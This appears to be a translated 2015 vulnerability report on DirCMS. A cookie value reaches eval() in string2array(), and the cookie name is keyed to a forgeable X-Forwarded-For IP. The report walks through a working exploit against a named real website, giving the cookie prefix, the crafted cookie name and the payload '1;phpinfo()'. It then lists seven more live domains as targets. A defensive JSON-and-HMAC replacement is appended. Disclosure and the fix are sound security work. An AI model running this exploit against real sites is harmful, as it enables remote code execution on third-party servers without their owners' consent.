2015-04-24: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly. 2015-06-08: The vendor has actively ignored the vulnerability; details are now public.
As titled.
Looking at /include/global.func.php:

```php
function string2array($str){
    if(disablefunc('eval')) exit('函数eval被禁用,可能无法正常使用本系统!');
    if($str=='') return array();
    if(is_array($str)) return $str;
    @eval("\$array = $str;");   // $str is interpolated straight into PHP source
    return $array;
}
```
This function can lead to arbitrary code execution, so the next step is to look at where it is called. In /pay/order.php:

```php
include substr(dirname(__FILE__),0,-3).'include/common.inc.php';
if($module->module_disabled('pay')){
    show404('该模块已被管理员禁用!');
}
include DIRCMS_ROOT.'pay/include/global.func.php';
include DIRCMS_ROOT.'pay/include/pay.class.php';
$payobj=new pay();
$action=isset($action)?$action:'step1';
session_start();
$cookiekey=dircms_md5('productarray'.IP);           // IP is the value returned by getIp()
$productarray=string2array(get_cookie($cookiekey));  // raw cookie value reaches eval()
```
Following dircms_md5:

```php
function dircms_md5($str){
    return substr(md5($str),8,16);   // 16 hex chars from the middle of the MD5
}
```
Here the IP is attacker-controllable:

```php
function getIp(){
    $ip='未知IP';
    if(!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return is_ip($_SERVER['HTTP_CLIENT_IP'])?$_SERVER['HTTP_CLIENT_IP']:$ip;
    } elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // Client-supplied header is trusted as long as it looks like an IP
        return is_ip($_SERVER['HTTP_X_FORWARDED_FOR'])?$_SERVER['HTTP_X_FORWARDED_FOR']:$ip;
    } else {
        return is_ip($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:$ip;
    }
}
```
It can be forged through X-Forwarded-For, which then gives arbitrary code execution. First, pick a site:
http://www.qzdszx.net
First visit
http://www.qzdszx.net/pay/order.php?action=step1
to obtain the cookie prefix
LadfOyQtuF
, then set X-Forwarded-For to 0.0.0.0 and construct a cookie named
LadfOyQtuFb98b87d11653f2da
with the content
1;phpinfo()
and refresh.
The code executes successfully.
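As an added defensive example (not code from this report or from DirCMS), here is how the cart cookie could be stored without the value ever reaching eval(): the array is serialised as JSON and bound to an HMAC under a server-side secret, so a tampered or attacker-minted cookie is rejected before it is parsed. DIRCMS_COOKIE_SECRET and the two helper names are assumptions.

```php
<?php
// Added example, not DirCMS code: JSON + HMAC replaces the eval()-based string2array().
// DIRCMS_COOKIE_SECRET is an assumed server-side secret that is never sent to the client.
const DIRCMS_COOKIE_SECRET = 'replace-with-a-random-32-byte-secret';

// Encode the cart as JSON and append an HMAC tag computed over that JSON.
function array2cookie(array $arr): string {
    $json = json_encode($arr, JSON_THROW_ON_ERROR);
    $tag  = hash_hmac('sha256', $json, DIRCMS_COOKIE_SECRET);
    return base64_encode($json) . '.' . $tag;
}

// Decode a cookie value; anything without a valid tag yields an empty cart.
function cookie2array(?string $cookie): array {
    if ($cookie === null || $cookie === '') {
        return [];
    }
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return [];
    }
    $json = base64_decode($parts[0], true);
    if ($json === false) {
        return [];
    }
    // Constant-time comparison so the tag cannot be recovered byte by byte.
    $expected = hash_hmac('sha256', $json, DIRCMS_COOKIE_SECRET);
    if (!hash_equals($expected, $parts[1])) {
        return [];
    }
    // json_decode() parses data only; a malformed body is simply rejected.
    $arr = json_decode($json, true, 8);
    return is_array($arr) ? $arr : [];
}

// Constructed sample cart, then two inputs that must be rejected:
// the payload string from the report, and a valid JSON body with a wrong tag.
$cookie = array2cookie(['12' => ['num' => 2, 'price' => '9.90']]);
var_dump(cookie2array($cookie));
var_dump(cookie2array('1;phpinfo()'));
var_dump(cookie2array(base64_encode('{"a":1}') . '.0000'));
```

Keying the cookie name to a client-supplied IP header adds nothing once the value itself is authenticated; binding the cart to the server-side session started by session_start() is the simpler choice.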
Cases
http://www.qzdszx.net/pay/order.php
http://www.cnbonds.com/pay/order.php
http://www.99lao.com/pay/order.php
http://www.tywcn.com/pay/order.php
http://www.0351mh.com/pay/order.php
http://www.0314chengde.com/pay/order.php
http://www.wusumenhu.com/pay/order.php
You are the professionals.
Unable to contact the vendor, or the vendor actively refused.